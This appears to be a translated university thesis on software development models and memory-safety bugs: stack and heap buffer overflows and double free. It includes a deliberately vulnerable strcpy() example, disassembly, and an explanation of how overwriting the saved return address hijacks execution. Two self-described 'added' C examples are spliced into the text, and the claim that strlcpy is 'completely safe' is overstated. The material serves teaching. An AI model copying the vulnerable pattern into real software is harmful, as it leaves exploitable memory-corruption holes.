Buffer overflow

Upload: hanh-tran

Post on 09-Jan-2016


A document on buffer overflows.


CONTENTS

LIST OF ABBREVIATIONS
LIST OF TABLES
LIST OF FIGURES
PREFACE
CHAPTER I. OVERVIEW OF THE SOFTWARE DEVELOPMENT PROCESS
1.1. GENERAL INTRODUCTION
1.1.1. The concept of software
1.1.2. The software development process
1.2. COMPONENTS OF SOFTWARE
1.2.1. Documents of the software development process
1.2.2. Components making up a software product
1.3. SOFTWARE DEVELOPMENT MODELS
1.3.1. The Waterfall model
1.3.2. The V model
1.3.3. The prototype model
1.3.4. The evolutionary model
1.3.5. The iterative and incremental model
1.3.6. The rapid application development model
1.3.7. The spiral model
Conclusion of Chapter I
CHAPTER II. SOFTWARE SECURITY BUGS AND SOME COMMON SOFTWARE SECURITY BUGS
2.1. GENERAL INTRODUCTION
2.1.1. Definition of a software bug
2.1.2. Definition of a software security bug
2.2. STACK BUFFER OVERFLOW
2.2.1. Understanding the stack
2.2.2. Stack-based buffer overflow
2.3. HEAP BUFFER OVERFLOW
2.4. DOUBLE FREE
Conclusion of Chapter II
CHAPTER III. TECHNIQUES FOR FINDING BUGS AND STEPS FOR EXPLOITING SOFTWARE SECURITY BUGS
3.1. FINDING AND DETECTING BUGS
3.1.1. In the role of the programmer
3.1.2. In the role of the tester
3.1.3. In the role of the hacker
3.2. STEPS OF EXPLOITING THE BUG
3.2.1. Attaching the program to a debugger
3.2.2. Determining the exact position of EIP in the buffer
3.2.3. Finding memory space to store the shellcode
3.2.4. Jumping to the shellcode reliably
3.2.5. Obtaining shellcode to complete the exploit
3.3. TECHNIQUES FOR JUMPING TO THE SHELLCODE
3.3.1. jump (or call)
3.3.2. pop return
3.3.3. push return
3.3.4. jmp [reg + offset]
3.3.5. blind return
3.3.6. Dealing with small buffers
3.3.7. SEH (Structured Exception Handling)
3.3.8. Some other techniques
3.4. SHELLCODE BACKDOOR
Conclusion of Chapter III
PROPOSAL FOR A SECURE SOFTWARE DEVELOPMENT PROCESS
CONCLUSION AND FUTURE DIRECTIONS
REFERENCES
APPENDICES
1. Appendix 1: The program when loaded in memory
2. Appendix 2: The process memory
3. Appendix 3
4. Appendix 4: Opcode table of jump and related instructions
5. Appendix 5: Steps of the demo

LIST OF ABBREVIATIONS

Abbreviation | Term | Meaning

SEP | Software Development/Engineering Process | Software development/engineering process
ID | Identifier | Identifier
CSDL | Cơ sở dữ liệu | Database
SRS | Software requirement specification | Software requirement specification
GUI | Graphical user interface | Graphical user interface
RUP | Rational Unified Process | Rational Unified Process
RAD | Rapid Application Development | Rapid application development model
OS | Operating system | Operating system
LIFO | Last In First Out | Last in, first out
ESP | Extended Stack Pointer | Extended stack pointer
EBP | Extended Base Pointer | Extended base pointer
EIP | Extended Instruction Pointer | Extended instruction pointer
NOP | No Operation Performed | No operation performed
DLL | Dynamic Link Library | Dynamic link library
CPU | Central Processing Unit | Central processing unit
SEH | Structured Exception Handling | Structured exception handling

LIST OF TABLES

Table 1. Functions that cause bugs
Table 2. Constructs that cause bugs
Table 3. Test cases
Table 4. Opcode table of jump and related instructions

LIST OF FIGURES

Figure 1.1 The Waterfall model
Figure 1.2 The V model
Figure 1.3 The Prototype model
Figure 1.4 The evolutionary model
Figure 1.5 The iterative and incremental model
Figure 1.6 Two development models
Figure 1.7 The spiral model
Figure 2.1 Stack
Figure 2.2 Push
Figure 2.3 Pop
Figure 2.4 Peek
Figure 2.5 The stack frame is created
Figure 2.6 The stack after the MOV instruction
Figure 2.7 The stack after the CALL instruction
Figure 2.8 ESP decreases by 4 bytes
Figure 2.9 ESP points to 0022FF5C
Figure 2.10 ESP decreases by 4 bytes again
Figure 2.11 ESP decreases by a number of bytes to make room for the variable
Figure 2.12 The stack after the MOV instruction
Figure 2.13 ESP points to the start of the string
Figure 2.14 strcpy() overwrites the saved EBP and the EIP
Figure 3.1 strcpy, strncpy and strlcpy
Figure 3.2 The application does not crash
Figure 3.3 The application crashes
Figure 3.4 The Windbg interface
Figure 3.5 The Immunity interface
Figure 3.6 EIP contains 42424242 (BBBB)
Figure 3.7 Contents of the buffer after Easy RM to MP3 runs
Figure 3.8 Contents of ESP
Figure 3.9 Contents of EIP after the application crashes
Figure 3.10 EIP holds the value BBBB
Figure 3.11 ESP holds the address 000ff730
Figure 3.12 Contents of the exploit buffer
Figure 3.13 ESP starts from the 5th character
Figure 3.14 ESP points to the first character of the pattern string
Figure 3.15 EIP contains 000ff730
Figure 3.16 Attaching windbg to Easy RM to MP3
Figure 3.17 ffe4 is the opcode of jmp esp
Figure 3.18 The opcode of jmp esp in the dll file
Figure 3.19 Result obtained when testing with the NOP/break sequence
Figure 3.20 Successful exploitation
Figure 3.21 A few opcodes
Figure 3.22 EIP overwritten with the address of jmp esp
Figure 3.23 Opcodes with the sequence 054,0xc3
Figure 3.24 A memory region filled with A
Figure 3.25 000ff849 is part of the pattern
Figure 3.26 344-byte shellcode, the application crashes
Appendix figure: Process memory layout in Win32

PREFACE

Today the development of information technology occupies an ever more important place in every area of life. The explosion of science and technology in general, and of information technology in particular, brings people many benefits: it shortens geographical distance, raises productivity, and saves time and cost at work. Now that information technology has developed as strongly as it has, the computer is an essential item for everyone. Every area of life and every profession involves computers, and working with a computer means working with software. Software has become an indispensable part of everyone's work at the computer. The strong growth of software technology has produced countless software products and tools serving every human need. Software brings enormous benefits; it solves many problems that people previously could not solve. Yet alongside those great benefits, software also brings no small amount of risk, and that risk comes from the security holes that appear in the software in use.

So what are these security holes? Why do they appear? How are they exploited? These are questions many people are trying to answer. Understanding software security holes is an extremely important matter and takes no small effort from software developers around the world.

The graduation thesis "Research on techniques for finding and exploiting software security holes" is organised in 3 chapters:

Chapter I. Overview of the software development process
- General theory of software
- Software development processes

Chapter II. Common software security bugs
- The concepts of software bug and software security bug
- A survey of some common software security bugs
- Analysis of the stack buffer overflow

Chapter III. Techniques for finding, detecting and exploiting software security bugs
- Techniques for finding software security bugs
- Techniques for exploiting software security bugs

Because the content covers much new material, time and knowledge are limited, and the research is based mainly on theory, the thesis certainly has shortcomings. I very much hope to receive comments from my teachers and friends so that it can be improved further.

During the work on this thesis and in completing this internship report, I sincerely thank the leadership of the Academy of Cryptography Techniques (Học Viện Kỹ Thuật Mật Mã) for their attention and for giving me an environment for study, training and research.
I sincerely thank the teachers of the Faculty of Information Technology, the Faculty of Information Security, the Faculty of Basic Sciences and the Faculty of Political Theory for the very valuable knowledge they gave me during five years of study at the academy. In particular I sincerely thank Mr. L M T and Mr. V nh Thu for their enthusiastic guidance in helping me complete this thesis. My sincere thanks!

CHAPTER I. OVERVIEW OF THE SOFTWARE DEVELOPMENT PROCESS

1.1. GENERAL INTRODUCTION

1.1.1. The concept of software

Software is a set of statements or instructions written in a programming language in a defined order, together with related data or documents, intended to carry out certain tasks or functions automatically or to solve a specific problem. Software performs its functions by sending instructions directly to the hardware or by supplying data that serves other programs or software. Software is an abstract concept: it cannot be touched or held, and it needs hardware in order to be executed.

1.1.2. The software development process

A process can be understood as the method of carrying out or producing something. Likewise, a software development process is the method of developing or producing a software product. A process normally comprises these basic elements:
- Procedures
- Activity guidelines
- Forms/templates
- Checklists
- Tools

with these main groups of work:
- Requirements specification: states the requirements, both functional and non-functional.
- Development: produces software that satisfies the requirements stated in the specification.
- Validation/testing: ensures that the software produced meets the requirements stated in the specification.
- Evolution: responds to the customer's changing needs.

Depending on the software development model, these groups of work are carried out in different ways. The same software product can be produced using different models; however, not every model suits every application.

1.2. COMPONENTS OF SOFTWARE

1.2.1. Documents of the software development process

- Customer requirements: this document is the result of requirements gathering. It consists of statements in natural language (and diagrams).
- Product specification: a detailed description of the software, serving the software design.
- Work plan: a detailed description of the work to be done during software development.
- Software design documents: documents on the software structure, data flow diagrams, state diagrams of exchange processes, and command annotations.
- Test documents: detailed documents for the testing process, including the test plan, the test case list, bug reports, and the list of test tools.

1.2.2. Components making up a software product

- Help files
- User's manual
- Samples and examples
- Labels and stickers
- Product support info
- Icons and art
- Error messages
- Ads and marketing material
- Setup and installation
- Readme file[1]

1.3. SOFTWARE DEVELOPMENT MODELS

1.3.1. The Waterfall model

Figure 1.1: The Waterfall model

This model consists of successive processing phases as shown in the figure.

Requirements and Specifications: the phase that determines the functional and non-functional requirements the software system must satisfy. This phase needs the customer's active participation and ends with a document called the Software Requirement Specification (SRS), which contains the set of requirements reviewed and approved by those responsible for the project (on the customer side). The SRS is the foundation for all subsequent activities until the end of the project.

System Analysis and Design: the phase that defines how the software system will meet what the customer demands in the SRS. It is the bridge between the "what" (the requirements) and the code that realises them.

Coding and Unit Test: the phase that implements the "how" laid out in the analysis and design phase.

Test: this phase tests the implemented code, including integration testing of groups of components and testing of the whole system (system test).
A final testing step is usually acceptance testing, with the customer taking the main role in deciding whether the software system meets their requirements.

Deployment and Maintenance: the phase of installing, configuring and training the customer. It fixes software errors (if any) and develops the new changes the customer requests (such as modifying, adding or removing system functions or features).

In practice, mistakes made in earlier phases are often noticed only in later phases, and one must go back to correct them. This is the iterative form of waterfall (Iterative Waterfall).

Advantages:
- The phases are defined, with clear inputs and outputs.
- The model is essentially document-based, especially in the early phases, where both inputs and outputs are documents.
- The software product is formed through a chain of construction activities in a clear sequence.

Disadvantages:
- It requires all software requirements to be clearly defined from the start of the project, whereas most real projects show that requirements usually contain many uncertain points.
- In practice, projects rarely carry out all the steps fully throughout the project cycle. Especially in the testing phase, when the delivery date is near, if problems arise from unclear requirements or design errors, the tendency is to modify the source code directly without the supplementary steps the model prescribes; as a result the specification and other intermediate products such as the design, even if updated later, may not fully reflect what was changed in the source code.
- Users have no chance to participate during the intermediate phases, from design through testing. Especially on large projects, users may realise only at the end of the project that the software system does not suit their needs.
- In general the model harbours many risks that can only be discovered in the final phase (illustrated in the figure), and the cost of correction can be very high.

Applications:
- Requirements are defined very clearly and in detail and hardly change, often originating from a product that has reached stability.
- New requirements added (if any) are also identified clearly and fully early in the project.
- The team is familiar with and fully understands all project requirements, and has much experience with the technologies used to develop the product.
- The project is judged to have almost no risk.

1.3.2. The V model

In the Waterfall model, testing is carried out in a separate phase.
In the V model, the whole process is divided into two corresponding groups of phases: development and testing. Each development phase is paired with a corresponding testing phase, as the figure shows.

Figure 1.2: The V model

The guiding idea of the V model is that testing activities must run in parallel (as far as possible) with development activities from the start of the cycle. For example, planning for whole-system testing can run in parallel with system analysis and design.

Advantages: testing activities are emphasised and run in parallel with the activities related to requirements specification and design. In other words, the model encourages test planning to start early in the development cycle rather than waiting for the end of implementation.

Disadvantages: the same as the waterfall model.

Applications: see the waterfall model.

1.3.3. The prototype model

Figure 1.3: The Prototype model

The prototype model is illustrated in the figure. The process starts with requirements gathering attended by representatives of both the development side and the customer, in order to define the overall goals of the future software system, record all the requirements that can be known, and sketch which groups of requirements still need clarification. Then a quick design is made, focused on conveying, through the prototype, the aspects the customer can visualise and evaluate, helping to complete the requirements for the whole system. This not only refines the requirements but also helps the development team understand better what needs to be developed. The prototype phase may be followed by a waterfall cycle or by another model. Note that the prototype is usually built very quickly in a short time, so it is not built on the same environment and tools as the real development phase that follows. The prototype is not meant to be reused in that later development.

Advantages: users visualise the system's functions and features early; communication between developers and users improves.

Disadvantages: when the prototype does not convey all the functions and features of the software system, users may be disappointed and lose interest in the system to be developed. Prototypes are built quickly, even hastily, in an implement-and-fix manner, and may lack careful analysis and evaluation of every aspect of the final system.
In general, this model still cannot eliminate the gap between the requirements and the final application.

Applications: systems based mainly on a user interface (GUI); customers, especially end users, who cannot state their requirements clearly.

1.3.4. The evolutionary model

Figure 1.4: The evolutionary model

This model is really also a form based on the prototype model, with one difference: the evolutionary model builds many successive prototype versions. Earlier prototype versions are built with the aim of being reused in later versions. The figure above illustrates the evolutionary model and shows that some parts of the software system can be built early, right from the requirements analysis and design phase.

Advantages:
- Emphasis on prototype reuse. Part of the system can be developed during the requirements analysis and design phases.
- Requirement changes are allowed and user participation is encouraged throughout the project cycle.

Disadvantages:
- It slows down the requirements development process and may draw attention away from intermediate work such as code review and low-level testing.
- It easily leads to a poor system structure.
- With this model, the rigour and transparency of the process are usually poor.

Applications:
- Small and medium interactive systems; the GUI part of large systems; systems that need a short development cycle.
- Development teams unfamiliar with the project's domain.

1.3.5. The iterative and incremental model

Figure 1.5: The iterative and incremental model

The iterative and incremental models are sometimes understood as one. However, a few differences can be distinguished.

First, both models share the spirit of the evolutionary model, and add the aim of delivering part of the system that the customer can put to use in a real production environment without waiting for the whole system to be completed (in the prototype and evolutionary models, the prototype or intermediate versions are not meant to go into real operation for the customer, except for the final version). For the customer to use it, every version must go through a complete process from requirements analysis (with possible additions or changes), design and implementation through to testing, and can be regarded as a sub-process (sub-cycle). The sub-cycles may use different models (usually waterfall). The figure above illustrates both models; each sub-cycle is a small waterfall.

The goal of the first version is to develop the core and the group of important functions.
After each version is put to use, the evaluation results are fed back and the sub-cycle of the next version is planned to carry out:
- changes to the previous version so as to meet customer needs better;
- possibly additional functions or features.

The difference between the incremental and iterative models can be understood simply as follows (compared with the product completed in the previous sub-cycle):
- Incremental model: adds functions to the product (see Figure 6).
- Iterative model: changes the product (see Figure 6).

A SEP can combine both the iterative and the incremental model, for example RUP (Rational Unified Process).

Figure 1.6: Two development models

Advantages:
- Risk is reduced early in the software development cycle. The important requirements are usually developed and delivered to users early.
- User feedback and the problems that arose in the previous version are used to improve subsequent versions and to prevent similar problems from recurring.

Disadvantages:
- The total cost of planning development for the whole system may be higher. Note that this refers only to the initial planning cost, not to all costs incurred; in practice, if applied properly, the total cost and time until the product is accepted can be lower than with other models.
- The requirements on planning and on the activities of the process may be more complex.

Applications:

Iterative model:
- The development team is familiar with the project domain but does not have much experience, especially with the technology used to develop the project.
- There are many technical risks.

Incremental model:
- Risks are analysed and identified from the start.
- Interfaces between modules are also clearly defined from the start.
- The development team is familiar with the project domain and has much experience.
- A large system developed over a long time, where the customer needs early deployment of some parts of the system.

1.3.6. The rapid application development model

The rapid application development model (RAD) is the incremental model with an extremely short development cycle. To achieve this, RAD relies on component-based development together with the reuse of suitable components. RAD suits information management systems.

Advantages: it reduces the development time of database applications with many user interfaces, or applications that integrate existing components. Users take part in the testing activities.

Disadvantages: it is hard to keep consistency between components developed by different teams.
It is unsuitable for applications with demanding performance requirements and usually depends on the support of the development environment and of a high-level language.

Applications: information management systems such as GUI- and database-based applications; tool support or a high-level language is available; the system has no strict performance requirements.

1.3.7. The spiral model

This model was built by Barry Boehm. It focuses on risk analysis and on planning how to resolve risks, through many successive nested sub-cycles based on the nature of the iterative model. In this model, the analysis and resolution of high-risk issues concentrate on the design of each specific aspect rather than on handling problems generically.

Figure 1.7: The spiral model

Figure 7 illustrates the model with iterative phases arranged in a rotating cycle, each cycle consisting of 4 sub-phases:
- Determine the quality objectives for the product being made, and at the same time decide whether to buy, reuse, or design and implement the system's components.
- Analyse the chosen option and the risks that may occur. This is done through various activities such as prototyping or simulation.
- Develop and verify the product at the next level, based on the direction given in sub-phase 2 (risk analysis).
- Review all the results of the preceding sub-phases and plan the next iteration.

Advantages:
- Risk analysis and evaluation are promoted as an essential part of every turn of the spiral, increasing the project's reliability.
- It combines the best properties of the waterfall and evolutionary models.
- It allows changes according to the actual conditions of the project at every turn of the spiral.
- It is the most general model: all other models can be regarded as instances of it, or it can be regarded as a synthesis of the other models. In particular, it is applied not only in software development but also in hardware development.

Disadvantages: complex and unsuitable for small projects with little risk; good risk analysis skills are needed.

Applications: large projects with many risks, or whose success has no firm guarantee; projects requiring much computation and processing, such as decision support systems.
- The project team has risk analysis capability.

Conclusion of Chapter I

Chapter I presented the concept of software and the software development process; the basic elements of a software development process; the documents of the development process and the components making up a software product; and surveyed the software development models together with their advantages, disadvantages and applications in software development. This chapter gives an initial overview of software and of developing a software product. In the next chapter we look at software security bugs and some common software security bugs.

CHAPTER II. SOFTWARE SECURITY BUGS AND SOME COMMON SOFTWARE SECURITY BUGS

2.1. GENERAL INTRODUCTION

2.1.1. Definition of a software bug

A software bug is a concept denoting a run-time error, an exploitable hole, an erroneous result, or incorrect operation of the software. Most bugs arise from mistakes or errors made by programmers while writing source code or during design. There are also bugs caused by the compiler working incorrectly. Serious bugs can cause the program to crash or freeze.

2.1.2. Definition of a software security bug

A software security bug is a software bug that allows an attacker to bypass the system's security mechanisms, for example bypassing access control to obtain unauthorised privileges. Some common attacks based on software bugs today are unauthorised remote access, privilege escalation and denial of service. Some common software security bugs are the stack buffer overflow, the heap buffer overflow and the double free.

2.2. STACK BUFFER OVERFLOW

2.2.1. Understanding the stack

In computer science, a stack is an abstract data structure operating on the Last In First Out (LIFO) principle: the element added last is the element taken out first.

The stack is part of the process memory. When a program is loaded into memory, the stack segment lies right after the heap segment[2]. The stack is allocated by the OS (operating system) for each thread[3] when the thread is created; when the thread ends, the stack is deleted. The size of the stack is defined when it is created and cannot be changed. Combined with LIFO, which requires no complex management mechanism, this makes the stack quite fast; however, it is limited in size.

Every element in a stack must be of the same data type, which can be any data type. A stack has a bottom and a top.
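The stack abstract data type of section 2.2.1, written out as an added C example (this is not code from the thesis; the type and function names are my own). Its push and pop check the bounds of the backing array and report failure instead of writing outside it; that check is exactly what the machine stack lacks when a local buffer is overrun in the rest of this chapter.

```c
#include <stddef.h>

/* Added example: a fixed-capacity stack of ints with the operations section 2.2.1
 * lists (push, pop, peek, isEmpty, clear). Names are illustrative. */
#define STACK_CAPACITY 8

typedef struct {
    int items[STACK_CAPACITY];
    size_t top;            /* number of elements; items[top-1] is the Top Item */
} int_stack;

void stack_clear(int_stack *s) { s->top = 0; }

int stack_is_empty(const int_stack *s) { return s->top == 0; }

/* Push: returns 1 on success, 0 when the stack is full. A full stack is refused
 * rather than overflowed into whatever lies beyond the array. */
int stack_push(int_stack *s, int value) {
    if (s->top >= STACK_CAPACITY) return 0;
    s->items[s->top++] = value;
    return 1;
}

/* Pop: removes the Top Item into *out; returns 0 on an empty stack (underflow). */
int stack_pop(int_stack *s, int *out) {
    if (s->top == 0) return 0;
    *out = s->items[--s->top];
    return 1;
}

/* Peek: reads the Top Item without removing it. */
int stack_peek(const int_stack *s, int *out) {
    if (s->top == 0) return 0;
    *out = s->items[s->top - 1];
    return 1;
}

/* Demonstration helpers: push 1..n and report how many fit (at most the capacity). */
int stack_demo_pushed(int n) {
    int_stack s;
    int pushed = 0;
    stack_clear(&s);
    for (int i = 1; i <= n; i++) pushed += stack_push(&s, i);
    return pushed;
}

/* Push 1..n, then pop once: LIFO means the last value pushed comes out first.
 * Returns -1 when nothing was pushed. */
int stack_demo_first_popped(int n) {
    int_stack s;
    int v;
    stack_clear(&s);
    for (int i = 1; i <= n; i++) stack_push(&s, i);
    return stack_pop(&s, &v) ? v : -1;
}
```

With n = 3 the first value popped is 3, showing the LIFO order; with n = 20 only 8 values are accepted, because push refuses the 9th instead of writing past the array.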
The element at the top of the stack is called the Top Item. Every add or remove operation takes place at the top of the stack.

Figure 2.1: Stack

A stack is simply a list, so it has most of the operations of a list, such as add and remove, although the implementation differs slightly. The most basic operations of a stack are:
- Push: insert an element into the stack (Figure 2.2: Push)
- Pop: take an element out of the stack (Figure 2.3: Pop)
- Peek: get the value of the element at the top of the stack (Figure 2.4: Peek)
- IsEmpty: check whether the stack is empty
- Clear: delete all elements in the stack

When the stack is created, the stack pointer points to the top of the stack (equal to the highest address of the stack). As soon as data is pushed onto the stack, the stack pointer decreases (to a lower address). So the stack grows toward lower addresses.

The stack holds local variables, function calls and other information that does not need to be stored for long. On every function call, the function's parameters are pushed onto the stack and values are saved into the registers (EIP, EBP)[4]. When the function ends, the saved EIP value is taken off the stack and put back into EIP, so the application can return normally.

2.2.2. Stack-based buffer overflow

A stack overflow occurs when the buffer that stores data in memory does not control the values written into it, so the stack overflows and the overflow overwrites the function's return address. To understand how the stack overflows, consider the following example with a stack buffer overflow:

    #include <string.h>

    void do_something(char *Buffer)
    {
        char MyVar[128];
        strcpy(MyVar, Buffer);      /* no length check: the overflow happens here */
    }

    int main(int argc, char **argv)
    {
        if (argc > 1)               /* guard added so the program runs without an argument */
            do_something(argv[1]);
        return 0;
    }

The application takes one argument (argv[1]) and passes it to the do_something() function. In that function, the argument is copied into a local variable of at most 128 bytes. So if the argument is longer than 127 bytes (plus 1 null byte terminating the string), the buffer can overflow.

When do_something() is called from main(), the following happens:

A stack frame is created on top of the parent stack. The stack pointer (ESP) points to the highest address of the newly created stack. This is the top of the stack.

Figure 2.5: The stack frame is created

Before do_something() is called, a pointer to the argument is pushed onto the stack. In this case it points to argv[1].

Figure 2.6: The stack after the MOV instruction

Next, the do_something function is called.
The CALL instruction first puts the current instruction pointer onto the stack (so that it knows where to return when the function ends) and jumps to the function code.

Figure 2.7: The stack after the CALL instruction

After the push, ESP decreases by 4 bytes and points to a lower address:

Figure 2.8: ESP decreases by 4 bytes

ESP points to 0022FF5C. At that address we see the saved EIP (return to), followed by the pointer to the parameter (AAAA in this example). That pointer was saved on the stack before the CALL was executed.

Figure 2.9: ESP points to 0022FF5C

Next, the function prologue executes. Basically, the frame pointer register (EBP) is put on the stack so that it can be restored when the function returns. The instruction that saves the frame pointer is push ebp. ESP decreases by 4 bytes again.

Figure 2.10: ESP decreases by 4 bytes again

After push ebp, the current stack pointer (ESP) is put into EBP. At this point both ESP and EBP point to the top of the stack. From then on, the stack is referenced by ESP (always the top of the stack at any moment) and by EBP, the base pointer of the current stack. In this way the application can reference its variables using offsets from EBP.

Most functions begin with PUSH EBP, followed by MOV EBP,ESP. So if you push 4 more bytes onto the stack, ESP decreases once more while EBP stays where it is. You can reference those 4 bytes as EBP-0x8.

Next, we look at how the stack allocates room for the variable MyVar (128 bytes). To hold the data, some space on the stack is allocated for the variable: ESP decreases by a number of bytes. This number may be more than 128 bytes, depending on the compiler. In the case of Devcpp[5], it is 0x98 bytes, so you will see the instruction SUB ESP,098. That makes room for the variable:

Figure 2.11: ESP decreases by a number of bytes to make room for the variable

The disassembly[6] of the function looks like this:

    00401290 /$ 55             PUSH EBP
    00401291 |. 89E5           MOV EBP,ESP
    00401293 |. 81EC 98000000  SUB ESP,98
    00401299 |. 8B45 08        MOV EAX,DWORD PTR SS:[EBP+8]    ; |
    0040129C |. 894424 04      MOV DWORD PTR SS:[ESP+4],EAX    ; |
    004012A0 |. 8D85 78FFFFFF  LEA EAX,DWORD PTR SS:[EBP-88]   ; |
    004012A6 |. 890424         MOV DWORD PTR SS:[ESP],EAX      ; |
    004012A9 |. E8 72050000    CALL                            ; \strcpy
    004012AE |. C9             LEAVE
    004012AF \. C3             RETN

The prologue is clearly visible: PUSH EBP and MOV EBP,ESP.
Next you see the allocation of space for MyVar: SUB ESP,98. Then you see some MOV and LEA instructions (basically setting up the parameters for the strcpy call). They can be explained as: take the pointer to argv[1] (which is at EBP+8) and copy it into EAX, then copy EAX into the MyVar variable (which is at ESP+4). In detail:

PUSH EBP: save EBP, then MOV EBP,ESP: ESP and EBP both point to the top of the stack, where EBP was just pushed.

SUB ESP,98: allocate a memory region of 152 bytes (0x98 hexadecimal to decimal).

MOV EAX,DWORD PTR SS:[EBP+8]: EBP plus 8 is the pointer to argv[1]. This step copies the address pointing to argv[1] into EAX. Note that an address is the length of one 32-bit register, i.e. 4 bytes.

MOV DWORD PTR SS:[ESP+4],EAX: copy EAX (the address of argv[1]) to ESP plus 4. Remember that after SUB ESP,98, ESP has been decreased to the top of the stack (as in the figure above) and no longer points where EBP points. ESP plus 4 is 4 bytes below the top (the stack grows from high to low). Now the 4 bytes at the top of the stack hold the address of argv[1].

LEA EAX,DWORD PTR SS:[EBP-88]: this instruction stores the address EBP minus 0x88 into EAX.

MOV DWORD PTR SS:[ESP],EAX: that address is then written at ESP. ESP now points to EBP minus 0x88, i.e. the start of the place where strcpy() stores the value of argv[1].

Figure 2.12: The stack after the MOV instruction

CALL ; \strcpy

After execution, LEAVE takes back the saved EBP and RET takes back the saved EIP, returning to main.

If there were no strcpy() in this function, the function would end and unwind the stack. Basically, it would move ESP back to the saved ESP and then execute RET. RET in this case takes the pointer from the stack at ESP and jumps to it. Then it returns to the main program, where do_something() was called. The epilogue is performed by the LEAVE instruction, which restores the frame pointer and EIP.

In our example there is a strcpy(). This function reads data from the address pointed to by [Buffer] and stores it (in the figure above), reading all the data until it meets a null byte (the string terminator). While copying, ESP stays where it points. strcpy() does not use PUSH to put the data on the stack; it reads 1 byte at a time and puts it on the stack using an index (like ESP, ESP+1, ESP+2). After the copy, ESP points to the start of the string.

Figure 2.13: ESP points to the start of the string

This means that if [buffer] is larger than 0x98 bytes, strcpy() overwrites the saved EBP and also the EIP.
It then just keeps reading and writing until it meets the null byte in the source string.

Figure 2.14: strcpy() overwrites the saved EBP and the EIP

ESP still points to the start of the string. strcpy() finishes if nothing goes wrong, and after strcpy() the function (do_something()) finishes. And this is where everything becomes interesting. The epilogue is triggered: basically it moves ESP back to where EIP was saved and then performs RET. RET takes the pointer there (AAAA, or 0x41414141, depending on the case) and jumps to that address.

So you control EIP. By controlling EIP, you change the return address from which the program would otherwise have continued normally. Of course, you can change the return address by taking advantage of the buffer overflow. So suppose you can overwrite the buffer in MyVar, EBP and EIP, and you have code of your own in the region before or after the saved EIP. After the overwrite, EIP will point to your code. Because you make EIP point to your code, you take control.

2.3. HEAP BUFFER OVERFLOW

The heap is used for dynamic memory allocation. In the C language[7], allocation and release are done through the two functions malloc() and free(). When a program is loaded into memory, the heap segment lies before the stack segment[8].

Because the heap is used to store data and not to store functions' return addresses as the stack is, exploiting a buffer overflow on the heap is much harder than exploiting one on the stack. A heap buffer overflow can nevertheless be exploited successfully in the following two ways:

Modifying data: the attacker can exploit the hole by overwriting important data. This can crash the program or change a value that can be exploited later (such as overwriting a user ID to grant additional access).

Modifying objects: in many programming languages such as C++ and Objective-C, objects placed on the heap contain function pointer tables and data. So the attacker is able to replace data or even replace the instance methods[9] of the object's class.

2.4. DOUBLE FREE

This bug occurs when free()[10] is called more than once with the same memory address (passed to free() as an argument). This can lead to a buffer overflow because the memory management data structures become corrupted. As a result the program may crash, or in some cases two subsequent malloc()[11] calls return the same value.
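An added C example for sections 2.3 and 2.4 (my code, not the thesis's): a heap record of the kind section 2.3 describes, holding a buffer next to a function pointer, with a bounds-checked write that refuses input which would spill from the buffer into the pointer, and a free helper that clears the caller's pointer so that a second free of the same address becomes a no-op instead of the double free of section 2.4. The type, function and field names are my own.

```c
#include <stdlib.h>
#include <string.h>

/* Added example. A heap object with data followed by a function pointer: the layout
 * section 2.3 says a heap overflow can corrupt. */
typedef struct record {
    char name[16];
    void (*handler)(struct record *);   /* would be hit by a write past name[] */
} record_t;

static void default_handler(struct record *r) { (void)r; }

/* Bounds-checked write into the record's buffer: returns 0 on success and -1 when
 * src (including its terminating NUL) would not fit, leaving the record untouched. */
int record_set_name(record_t *r, const char *src) {
    size_t n = strlen(src);
    if (n >= sizeof r->name) return -1;
    memcpy(r->name, src, n + 1);
    return 0;
}

/* Free through a pointer-to-pointer and null it. Returns 1 if memory was released,
 * 0 if the pointer was already NULL, so a repeated call cannot free twice. */
int safe_free(void **pp) {
    if (pp == NULL || *pp == NULL) return 0;
    free(*pp);
    *pp = NULL;
    return 1;
}

/* Two release attempts on the same allocation: only the first frees. Returns the
 * number of frees performed (1), or -1 if the test allocation itself failed. */
int demo_double_free(void) {
    void *p = malloc(64);
    if (p == NULL) return -1;
    int first = safe_free(&p);
    int second = safe_free(&p);   /* p is NULL now: no second free() */
    return first + second;
}

/* A 32-byte name into a 16-byte field is rejected and the handler survives intact.
 * Returns 1 on that outcome, 0 otherwise, -1 if allocation failed. */
int demo_overflow_rejected(void) {
    record_t *r = malloc(sizeof *r);
    if (r == NULL) return -1;
    r->handler = default_handler;
    int rc = record_set_name(r, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");   /* 32 x 'A' */
    int intact = (rc == -1) && (r->handler == default_handler);
    void *p = r;
    safe_free(&p);
    return intact;
}

/* A name that fits is stored with its terminator. Returns 1 on success. */
int demo_name_fits(void) {
    record_t r;
    r.handler = default_handler;
    return record_set_name(&r, "alice") == 0 && strcmp(r.name, "alice") == 0;
}
```

Nulling the pointer only protects the one variable it was freed through; copies of the same pointer held elsewhere still need to be tracked, which is why ownership of each allocation should be kept to a single place.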
This leads to the attacker controlling the data written in the doubly allocated memory region.

Conclusion of Chapter II

Chapter II presented the concepts of the software bug and the software security bug. In this chapter we looked at some common software security bugs: the stack buffer overflow, the heap buffer overflow and the double free. We concentrated mainly on analysing the stack buffer overflow, which today is the most common bug and also the easiest to exploit. The most important point about this bug is overwriting EIP so as to control the flow of execution, that is, to point to the code we want executed. In the next chapter we study how to find this bug and the steps to exploit it.

CHAPTER III. TECHNIQUES FOR FINDING BUGS AND STEPS FOR EXPLOITING SOFTWARE SECURITY BUGS

3.1. FINDING AND DETECTING BUGS

3.1.1. In the role of the programmer

For programmers, finding bugs depends heavily on their programming experience. They find bugs mainly by examining the software's source code. An experienced programmer concentrates on the functions with a high risk of causing bugs. Some functions we know of are: strcat, strcpy, strncat, strncpy, sprintf, vsprintf, gets... There are also certain constructs that can cause bugs.

Let us consider 3 functions: strcpy, strncpy and strlcpy.

Figure 3.1: strcpy, strncpy and strlcpy

strcpy writes the string into memory and overwrites whatever data follows it. If the string it writes is larger than the memory declared for it, the excess data is written over the memory immediately after. This causes a buffer overflow.

strncpy writes only as much data as fits the allocated memory, but it does not add a string terminator. This means that when the string is read, the bytes of data that follow it may be read out as well.

strlcpy is completely safe because it automatically adds the terminator at the end.

The following table lists functions of the same kind:

FUNCTIONS NOT TO USE | FUNCTIONS TO USE

strcat | strlcat
strcpy | strlcpy
strncat | strlcat
strncpy | strlcpy
sprintf | snprintf or asprintf
vsprintf | vsnprintf or vasprintf
gets | fgets
